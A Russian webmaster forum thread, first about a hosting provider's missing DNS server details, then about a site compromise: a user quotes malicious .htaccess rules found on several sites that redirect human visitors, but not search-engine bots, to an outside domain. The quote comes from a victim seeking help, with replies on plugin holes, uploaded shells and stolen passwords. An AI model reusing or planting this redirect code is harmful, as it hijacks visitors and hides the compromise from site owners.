- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
А ДНС че такие прописывать?
ns01.whitesuite.ru
ns02.whitesuite.ru
или
ns1.whitesuite.ru
ns2.whitesuite.ru
Щас у хостов мода пошла, в письмах ДНС не писать какие прописывать, где их потом искать хз, в панельке нашел ДНС и вот щас думаю какие прописывать
Не мода. Просто не догадались. Завтра же впишем. Спасибо за идею :)
Не мода. Просто не догадались. Завтра же впишем. Спасибо за идею :)
Ну хоть кому то моя идея помогла, и я вам скажу хостеры, у большинства нету этих данных в письмах.
И еще укажите вписьме что надо использовать 22 порт а то я как то по старинке использовал 21 порт для входа через ФТП
У многих хостеров днс есть в письмах, но как показывает практика, к сожалению клиенты в письмах видят только ссылку на панель, логин и пароль, а за днс стучат в тикет. Увы, но каждый третий не читает письма до конца.
Вчера, на сайте моей матери (которая размещает свой сайт на данном хостинге) Касперский обнаружил вирус, вчера и сегодня целый день пытаюсь его удалить, но ничего не получается. Заметил что во всех файлах .htaccess на хостинге появился вот такой код
RewriteCond %{HTTP_USER_AGENT} !(bot|accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://m.fallsky.info/?19&source=178.63.200.193 [L,R=302]
Но каково же было мое удивление, когда и на своих сайтах на этом хостинге в файле .htaccess заметил то же самое (свои пароли храню только на бумажном носителе, к которому имею доступ только я).
Возникает вопрос, а не взломал ли кто-то хостера? При чем это могло произойти давно, т.к. давно не проверял файлы .htaccess
Надеюсь, у вас не возникло крамольных мыслей о дырявых плагинах и залитых шеллах )
;11836723']Надеюсь, у вас не возникло крамольных мыслей о дырявых плагинах и залитых шеллах )
нет, возможно на сайте у матери и стоят какие то дырявые плагины, но мои сайты все на чистом html поэтому дыр быть не может
у матери сайт на WP, мои сайты все на чистом html поэтому дыр быть не может
Если взломан один сайт, то пролезть на другие сайты на том же аккаунте, как правило, не составляет труда.
;11836730']Если взломан один сайт, то пролезть на другие сайты на том же аккаунте, как правило, не составляет труда.
согласен, но аккаунты разные
согласен, но аккаунты разные
Ого…
Вообще, хостеров ломают крайне редко.
Попросите у службы поддержки логи заходов на фтп — наверняка найдёте там подозрительные айпишники.
igrinov, разумеется у вас на компьютере и вирусов быть не может, которые могли бы украсть пароли?